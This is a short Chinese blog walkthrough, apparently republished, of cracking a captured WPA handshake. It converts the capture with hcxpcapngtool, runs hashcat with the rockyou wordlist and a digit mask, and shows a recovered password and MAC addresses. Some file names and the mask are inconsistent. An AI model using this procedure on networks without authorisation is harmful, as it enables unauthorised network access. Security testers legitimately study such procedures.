当前位置：首页 > news >正文

关于利用hashcat破解WiFi数据包的操作记录

news 2025/8/8 9:44:30

准备数据包相关转换工具

┌──(kali㉿kali)-[~/cap/3204]
└─$ sudo apt-cache search hc | grep '^hc'
hcloud-cli - command-line interface for Hetzner Cloud
hcxdumptool - Small tool to capture packets from wlan devices
hcxkeys - Tools to generate plainmasterkeys (rainbowtables)
hcxtools - Tools for converting captures to use with hashcat or John the Ripper

安装相关工具

┌──(kali㉿kali)-[~/cap/3204]
└─$ sudo apt install -y hcxdumptool hcxkeys hcxtools
其中，格式转换工具

──(kali㉿kali)-[~/cap/3204]
└─$ hcxpcapngtool --help
hcxpcapngtool 6.2.7 (C) 2022 ZeroBeat
convert pcapng, pcap and cap files to hash formats that hashcat and JtR use
usage:
hcxpcapngtool <options>
hcxpcapngtool <options> input.pcapng
hcxpcapngtool <options> *.pcapng
hcxpcapngtool <options> *.pcap
hcxpcapngtool <options> *.cap
hcxpcapngtool <options> *.*
short options:
-o <file> : output WPA-PBKDF2-PMKID+EAPOL hash file (hashcat -m 22000)
get full advantage of reuse of PBKDF2 on PMKID and EAPOL
-E <file> : output wordlist (autohex enabled on non ASCII characters) to use as input wordlist for cracker
retrieved from every frame that contain an ESSID
-R <file> : output wordlist (autohex enabled on non ASCII characters) to use as input wordlist for cracker
retrieved from PROBEREQUEST frames only
-I <file> : output unsorted identity list to use as input wordlist for cracker
-U <file> : output unsorted username list to use as input wordlist for cracker
-D <file> : output device information list
format MAC MANUFACTURER MODELNAME SERIALNUMBER DEVICENAME UUID

转换数据包格式为hashcat可以破解的格式

┌──(kali㉿kali)-[~/cap/3204]
└─$ hcxpcapngtool 64-09-80-76-D6-48_handshake.cap -o 64-09-80-76-D6-8_handshake.hccapx
hcxpcapngtool 6.2.7 reading from 64-09-80-76-D6-48_handshake.cap...

破解数据包

┌──(kali㉿kali)-[~/cap/3204]
└─$ zcat /usr/share/wordlists/rockyou.txt.gz | hashcat -a 0 -m 22000 64-09-80-76-D6-48_handshake.hccapx

查看结果：

┌──(kali㉿kali)-[~/cap/3204]
└─$ zcat /usr/share/wordlists/rockyou.txt.gz | hashcat -a 0 -m 22000 64-09-80-76-D6-48_handshake.hccapx --show
665dfcd30d67fa2792496adbadf92ec8:64098076d648:ce725514c434:3204:88888888

也可以用掩码进行破解

──(kali㉿kali)-[~/cap/3204]
└─$ hashcat -a 3 -m 22000 64-09-80-76-D6-48_handshake.hccapx ?d?d?d?d?d?d?d?d?d --force --show
665dfcd30d67fa2792496adbadf92ec8:64098076d648:ce725514c434:3204:88888888

查看全文

http://www.lryc.cn/news/365138.html